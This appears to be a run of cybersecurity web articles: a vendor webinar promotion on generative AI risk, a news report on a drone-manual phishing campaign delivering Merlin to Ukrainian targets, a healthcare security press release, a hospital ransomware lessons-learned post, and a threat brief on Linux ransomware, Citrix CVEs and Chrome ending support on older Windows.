Sep 25, 2023The Hacker NewsArtificial Intelligence / Cybersecurity

Generative AI is a double-edged sword, if there ever was one. There is broad agreement that tools like ChatGPT are unleashing waves of productivity across the business, from IT, to customer experience, to engineering. That’s on the one hand.

On the other end of this fencing match: risk. From IP leakage and data privacy risks to the empowering of cybercriminals with AI tools, generative AI presents enterprises with concrete concerns. For example, the mass availability of AI tools was the second most-reported Q2 risk among senior enterprise risk executives — appearing in the top 10 for the first time — according to a Gartner survey.

In this escalating AI arms race, how can enterprises separate fact from hype and comprehensively manage generative AI risk while accelerating productivity?

Register here and join Zscaler’s Will Seaton, Product Marketing Manager, ThreatLabz, to:

• Uncover the tangible risks of generative AI — both for employee AI usage and by threat actors benefiting from the increased speed, sophistication, and scale of attacks enabled by gen AI.

• Learn how Zscaler has approached internal AI tool controls.

• Discover how AI-powered innovation like Zscaler’s AI-powered Cloud Sandbox and ML-driven automatic data classification can help secure your enterprise from unknown AI-enabled threats and prevent your data from being leaked or exfiltrated.

• See how powerful new AI-based tools like Zscaler Risk360 enable you to visualize, quantify, and remediate cybersecurity risk comprehensively, while quantifying the financial impact of your security efforts.

Why Attend?

This will not be the first time you’ve heard about generative AI — far from it — and many of you may even be experts in prompt engineering. However, this is a fantastic opportunity to learn new insights from an organization where AI and ML innovation has been a core competency of the platform for many years.

• Cut through the AI hype and glean insights from the world’s largest security cloud and our world-class threat research organization, ThreatLabz.

• Benefit from practical, grounded best practices to secure your workforce, including using cloud application controls, browser isolation, and DLP policy to secure AI applications while unleashing the full potential of generative AI.

• Learn how AI-driven innovation can help you to comprehensively and quantifiably manage enterprise risk, shrink your attack surface, gain prioritized, actionable steps to measurably improve your security posture, quantify the financial impact of security improvements, and much more.

• Look at new and upcoming AI-powered innovation at Zscaler, including products like Risk360, Multimodal DLP, and Zscaler Security Autopilot with Breach Prediction.

Tap into our security expertise to learn more about how AI-powered innovation at Zscaler can help you unleash the full potential of generative AI, while keeping your data, applications, and users secure. Register for the webinar on October 2nd.

Sep 25, 2023THNCyber Attack / Phishing

Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin.

“Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface,” Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

The cybersecurity company is tracking the campaign under the name STARK#VORTEX.

The starting point of the attack is a Microsoft Compiled HTML Help (CHM) file that, when opened, runs malicious JavaScript embedded inside one of the HTML pages to execute PowerShell code designed to contact a remote server to fetch an obfuscated binary.

The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host.

“While the attack chain is quite simple, the attackers leveraged some pretty complex TTPs and obfuscation methods in order to evade detection,” the researchers said.

This is the first time Ukrainian government organizations have been targeted using Merlin. In early August 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) disclosed a similar attack chain that employs CHM files as decoys to infect the computers with the open-source tool.

CERT-UA attributed the intrusions to a threat actor it monitors under the name UAC-0154.

“Files and documents used in the attack chain are very capable of bypassing defenses,” the researchers explained.

“Typically receiving a Microsoft help file over the internet would be considered unusual. However, the attackers framed the lure documents to appear as something an unsuspecting victim might expect to appear in a help-themed document or file.”

The development arrives weeks after the CERT-UA said it detected an unsuccessful cyber attack against an unnamed critical energy infrastructure facility in the country undertaken by the Russian state-sponsored crew called APT28.

FRANKLIN, Tenn. – July 18, 2023 – Fortified Health Security (Fortified), a Best in KLAS managed security services provider (MSSP) specializing in healthcare cybersecurity, announced the release today of its highly anticipated 2023 Mid-Year Horizon Report. The report delves into the significant cybersecurity challenges impacting the healthcare industry, and provides valuable insights to help healthcare organizations protect patient data and strengthen their security posture.

The first half of 2023 has presented hospitals and health systems with a multitude of challenges, including staffing and budget constraints, technological limitations, and cybersecurity risks. As healthcare facilities strive to ensure patient safety and data protection, the federal government has taken notice and is actively working on legislative initiatives to address these pressing issues.

“Data breaches are a growing concern in the healthcare industry, affecting millions of individuals,” said Dan L. Dodson, CEO of Fortified Health Security. “Our Mid-Year Horizon Report unpacks some of what we and others in our industry have observed since the beginning of the year, and offers recommendations for how we can work together to create a more secure healthcare ecosystem.”

The report covers a range of critical topics in healthcare cybersecurity, including:

• Mid-year data breach statistics and trends
• Legislative progress and priorities
• Data theft and covert tactics
• The promise and pitfalls of AI and ChatGPT
• Risk-based identity alerting

The 2023 Mid-Year Horizon Report reveals notable facts, such as the alarming increase in reported data breaches. Since the beginning of 2023, the U.S. Department of Health and Human Services has received reports of nearly 250 breaches, affecting more than 24 million individuals, representing a 56% increase compared to the same period in 2022.

The report also features a contribution from Fortified’s Senior Virtual Information Security Officer, Kate Pierce, who testified before the U.S. Senate’s Homeland Security and Government Affairs Committee. Her insights shed light on the cybersecurity risks faced by healthcare organizations, particularly smaller and rural ones, and provide proactive recommendations that may help mitigate these threats.

“We believe that by working together, leveraging educational initiatives, and embracing the resources available, we can forge a more secure future for the healthcare industry and ensure the well-being of patients,” added Dodson.

The full report is available for download here.

About Fortified Health Security

Fortified is Healthcare’s Cybersecurity Partner® – protecting patient data and reducing risk throughout the healthcare ecosystem. A managed security service provider that has been awarded numerous industry accolades, Fortified works alongside healthcare organizations to build customized programs that help clients leverage their prior security investments and current processes while implementing new solutions that reduce risk and increase their security posture over time. Led by a team of industry-recognized cyber experts, Fortified’s high-touch engagements and client-specific process maximize value and deliver an actionable, scalable approach to help reduce the risk of cyber events. To learn more, visit www.fortifiedhealthsecurity.com.

Press contact information: 

Denise Reed
Fortified Health Security
dreed@FortifiedHealthSecurity.com

Tom Testa 
Anderson Interactive 
tom@andersoni.com  

In television dramas and Hollywood movies, ransomware attacks are often made known by a flashy message that pops up on the computer screen or an ominous voice message left by the cyber criminal.

In the case of one hospital, the incident presented itself far more subtly.

Around 5:00 pm, the day after a holiday, calls started coming into the hospital’s IT team that an application was down. Then another. Followed by another.

Initially, the hospital’s IT team assumed they were dealing with a power issue and started investigating. It wasn’t until they stumbled upon the ransom note, hidden in a simple text file, that they realized their hospital had fallen prey to a ransomware attack.

Decisions, diversions, and disruptions   

Because the team had no idea how widespread the attack was or what they were dealing with, they made the difficult but necessary decision to shut down all the hospital’s servers. In a non-hospital setting, this decision certainly isn’t easy, but in a hospital environment, it’s especially precarious as patient care and safety can be impacted.

What’s more is that shutting down systems often means that patients need to be diverted to other healthcare facilities, further disrupting care. While patient care was able to continue, it was in a delayed capacity. This slowdown also impacted the emergency department, leading to backlogs in their intake process.

Communications

Internal communication challenges compounded the situation. With the phone and email systems down, the primary methods that the hospital staff relied on to reach their colleagues, communication became difficult as few people had access to alternative phone numbers.

The stakeholders working to respond to the cyber attack established a command center to enable better communication and coordination. This helped them address multiple issues simultaneously, including contacting vendors, the cyber insurance provider, legal, and law enforcement.

Vendors

At the time of the incident, a third-party vendor hosted the hospital’s electronic medical records (EMR). To help preserve those records and protect the vendor, the IT team severed the connection and informed the EMR administrator. They also took similar actions for any other vendors connected to their systems.

Some vendors who were engaged to provide response and recovery assistance added an unexpected layer of complexity to the incident by wanting to focus on getting an updated contract in place before moving forward with support. Others, however, immediately provided the hospital with whatever help they needed, with a mutual agreement that a contract would be addressed to reflect the support once the hospital had gotten passed the incident. 

Cyber Insurance

Initially, the hospital team was unable to get ahold of their cyber insurance provider. Due to their systems being down, they didn’t have access to the provider’s after-hours phone number. Fortunately, a few team members had the foresight to save some vendor contacts on their personal mobile devices and were able to connect with the cyber insurance provider and other vendors for assistance.

Once the cyber insurance provider got involved, they were able to use their expertise and resources to help the hospital team navigate the complex landscape of a ransomware incident and get them on the path to recovery.

Legal

The cyber insurance company also provided the hospital with a lawyer experienced in ransomware incidents and coordinating the nuanced communication components.

Something that surprised the IT team was the executive team’s direction to restore the phone system first. The team’s initial thought was to restore the EMR connection and other critical systems, but once the IT team synchronized with the executive leadership team, it became clear how critical accessible and streamlined communication is to a ransomware recovery effort.

In addition to keeping internal staff informed, it was imperative to communicate the situation effectively to the community and ensure that they could reach the hospital when necessary. To achieve this, the legal team collaborated with the hospital’s marketing and compliance departments to devise a communication and messaging strategy. The legal team also played a pivotal role in crafting response letters to vendors and handling any legal implications that arose during the incident.

Law enforcement

The hospital notified both the Federal Bureau of Investigation (FBI) and local law enforcement about the incident. The FBI provided primary support for the hospital since most local law enforcement agencies lacked a cyber response team.

Ransomware attack lessons and learnings

Despite the challenges, the ransomware incident provided valuable opportunities for learning and growth, leading the hospital to adopt a much stronger cybersecurity posture.

Takeaway 1: Prepare for the worst, hope for the best

With healthcare ransomware attacks on the rise, it’s essential to accept the possibility that your hospital or health system will be impacted by one. By taking proactive measures to secure your defenses, and making your cybersecurity program a top priority within your organization, you’ll be in a stronger position to control the situation and successfully navigate the situation.

For example, conduct regular tabletop exercises. In cybersecurity, experts design tabletop exercises to mimic a real-life cybersecurity incident without affecting the organization’s live systems. The objective is to help organizations assess and improve incident response and cybersecurity readiness.

Involving the entire organization in incident response and recovery planning is imperative. Ransomware incidents impact the entire organization, and a collaborative approach ensures a coordinated and swift response.

Takeaway 2: Understand the scope and scale of your cybersecurity insurance

Cyber insurance goes beyond financial assistance, offering expertise, guidance, and resources that can prove invaluable during a crisis. It’s also likely that your cyber insurance provider will be of more assistance than you might realize. To avoid duplicating efforts and save time, know what your cyber insurance covers. This insight will help you focus on identifying gaps that your internal team or partners need to address.

Takeaway 3: Have backups for your backups

Don’t underestimate the importance of having backup systems in place and maintaining up-to-date documentation. Backup systems should be comprehensive and regularly tested to ensure reliability.

For example, having a non-electronic backup of vendor and staff contact lists is an often-overlooked aspect of incident response. Creating this list, maintaining it, and ensuring that it’s easily accessible can help ensure communication channels remain open during incidents, even when digital systems are compromised.

Takeaway 4: Supplement your resources

Having good, reliable partners in place who can come to your aid when you need it is priceless during a ransomware attack. Many organizations will have a 24/7 help desk, but they typically don’t have 24/7 server and network administrators, or security analysts.

Even during a cyber attack, when your systems are down, your staff is going to have to sleep at some point. Having pre-arranged support help cover additional shifts during a critical cyber event can help ensure your response and recovery aren’t slowed down.  

Takeaway 5: Align on ransomware payment

In a ransomware incident, to pay or not to pay really is the question. Well in advance of an attack, internal cybersecurity stakeholders should create and align on the organization’s policy and plan around paying the ransom. Figuring that out during a ransomware incident is likely to result in unnecessary confusion and chaos.

Takeaway 6.  Operationalize your system recovery process

After the ransomware attack, the hospital’s IT team faced an unexpected challenge. While the IT team had a pre-defined recovery order for the most critical systems, there were a lot of back-and-forth discussions around the order of recovery, and significant time spent putting the system recovery order together, and getting executive-level input and approval.  

Had the order of system recovery been outlined in advance, with executive sign-off, communications and expectations around the recovery progress would have led to more productive progress.

Takeaway 7: Clarify your communication strategy

Ensure you have a well-defined, step-by-step communication strategy that extends throughout the entire organization, all the way to the executive level. Hospital staff will naturally seek updates and clarity about the ransomware situation and what lies ahead. While you may not have all the answers immediately, having a clear communication plan in place will help ensure staff, patients, and the community receive the support and reassurance they need during the challenging situation.

Resiliency after a ransomware attack

This real-life ransomware incident serves as a stark reminder of the critical importance of cybersecurity preparedness within hospitals and health systems. Proactive measures, such as comprehensive cybersecurity programs, cyber insurance coverage, and robust incident response planning, are vital to protect against the ever-evolving threats these organizations face.

To learn what steps the hospital took to recover from this ransomware attack, watch our on-demand webinar, From crisis to recovery: Lessons learned from a hospital’s ransomware attack.

Tamra Durfee is an experienced CISO with over 25 years in information security, compliance, regulatory risk, strategy, innovation, and technology transformation. For the past 8 years, she has specialized in healthcare cybersecurity and building risk-based medical device information security programs. She is a presenter at HIMSS, CHIME, CHA, and a healthcare security contributor to Healthcare IT News. Tamra holds certifications as a Certified Healthcare CIO (CHCIO), Certified Digital Healthcare Executive (CDH-E), GIAC Security Leadership Certification, Certified Professional in Healthcare Information Management Systems (CPHIMS), and IBM Certified Solutions Architect.

In July, cybercriminals increasingly targeted Linux systems and exploited new zero-day vulnerabilities in Citrix solutions. While threat actors never cease looking for new vulnerabilities to exploit, it’s worth noting that this surge in cyber activity aligns with the industry trend of retiring software products in the Fall. Both Windows and Google have products nearing their end-of-life (EoL) status, introducing potential vulnerabilities that require prompt attention.

Crippling Attacks Targeting Linux Systems  

A report from the Palo Alto Networks Unit 42™ research team reveals that from December 2022 to May 2023, there was a 50% increase in malicious files targeting Linux systems. High-profile groups like Cl0p, Hive, and Blackcat are producing ransomware and malware tailored for Linux, including REvil, Tycoon, QNAPcrypt, and Darkside. 

While Linux’s proactive open-source community has traditionally patched flaws swiftly, ensuring its reputation for security, the rising cybersecurity threats challenge this stance. It’s vital to intensify patching and hardening efforts for Unix/Linux systems. Neglecting their security could lead to severe consequences.

Impacts on healthcare organizations 

Many vital systems, like those in hospitals, run on Linux. If hit with a ransomware attack, essential services necessary for patient care can be disrupted. And depending on the preparedness of the response team, recovery could take weeks or even months. Such attacks can tarnish the organization’s reputation, expose sensitive patient data, and lead to extortion attempts by the attackers.

Recommendations 

Users of Linux-based operating systems are instructed to:  

• Scan *nix systems using credentialed scans – commonly provided in the form of SSH credentials 
• Patch and upgrade Linux operating systems identified as vulnerable 
• Check Linux/Unix system configurations for default or weak passwords to include root users 
• Disable booting from external sources 
• Enable SELinux in the ‘/etc/selinux/config’ file 
• Update repositories and applications 
• Avoid using unencrypted protocols on any operating system 
• Encrypt data transfers 
• Disable root login and unwanted services / assign complex passwords for root users 
• Closed unused ports 
• Operating systems in the minority, such as Linux, should be treated like the majority, such as Microsoft 
   

Citrix ADC and Gateway Appliances Zero-days 

On July 18, 2023, Citrix published a security bulletin announcing fixes for three new vulnerabilities. These are new vulnerabilities and should not be confused with vulnerabilities reported with the same Citrix systems by Fortified in May 2023.

The new vulnerabilities allow for remote code execution, privilege escalation to root administrator, and cross site scripting. Successful attacks could allow for data exfiltration or ransomware deployment, compromising Patient Health Information (PHI) and patient care, or downtime of systems.  

Cloud Software Group is urging customers to upgrade affected systems as soon as possible, as these vulnerabilities are being actively exploited by threat actors. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action, though confirmation with the vendor is recommended. 

Affected products/versions  
NetScaler ADC and NetScaler Gateway version 12.1 are now (EoL) and vulnerable.  

• NetScaler ADC and NetScaler Gateway 1 before 13.1-49.13 
• NetScaler ADC and NetScaler Gateway 0 before 13.0-91.13 
• NetScaler ADC 13.1-FIPS before 13.1-37.159 
• NetScaler ADC 12.1-FIPS before 12.1-55.297 
• NetScaler ADC 12.1-NDcPP before 12.1-55.297 
• CVE-2023-3519: Unauthenticated remote code execution 
• CVE-2023-3467: Allows for privilege escalation to root administrator (nsroot) 
• CVE-2023-3466: Reflected XSS vulnerability 
• CVE-2023-3519 is known to be actively exploited by threat actors 

Recommendations 

• Review all Citrix ADC and Gateways to ensure they are running the latest firmware versions 
• Include Citrix appliances in routine VTM scanning efforts with proper credentials applied 
• Review all accounts with access to Citrix resources and disable those accounts where access is not necessary 
• Consider a reinforcing policy that allows disabling and restriction of user accounts not actively using these resources for a time (30-90 days is common) 
   

Google Chrome Sunsetting on Old Windows Systems 

Google Chrome/Edge is ending support for Windows 7, Windows 8/8.1, Windows Server 2012, and Windows 2012 R2. If left unmitigated, Google Chrome’s existence on out-of-date Operating Systems opens up a wide threat landscape for attackers. Many health systems have those OSs in their environments, which could lead to security threats like compromised data, compatibility issues, low performance, and stolen passwords.

Google will require Windows 10 or later, or Windows Server 2016 or later to keep Google Chrome up to date. Due to this, Chrome 109 is the last version of Chrome that will support those older OSs. To ease customer transitions, Google will issue critical severity security fixes and fixes for bugs for Chrome 109 on these OSs until October 10, 2023.

This decision by Google also affects Chromium-based Edge. Microsoft Edge browser version 109 and WebView2 Runtime version 109 will be the last respective versions for the same listed OSs. Edge will receive critical security fixes and fixes for known exploit bugs until October 10, 2023. 

Affected products/versions 
Google Chrome/Edge on the below Operating Systems 

• Windows 7 
• Windows 8/8.1 
• Windows Server 2012  
• Windows Server 2012 R2

Recommendations 

It’s imperative to review the various applications used in the hospital as some may be dependent upon a browser version. These changes may also affect the functionality of those applications. 

• Upgrade affected OSs 
• Remove Chrome and Edge from affected OSs 
• Install Firefox ESR on systems where Chrome has sunset 
• Re-evaluate the need for browsers and general internet access on machines with EoL Oss 
• Installing Mozilla Firefox on Systems that cannot be upgraded as Firefox ESR on Windows 7/8 will continue receiving updates until September 2024

Healthcare is the leading sector for ransomware incidents. If your health system is ever faced with a cyber incident, learn how to navigate it and better protect your network on our-demand webinar, From crisis to recovery: Lessons learned from a hospital’s ransomware attack.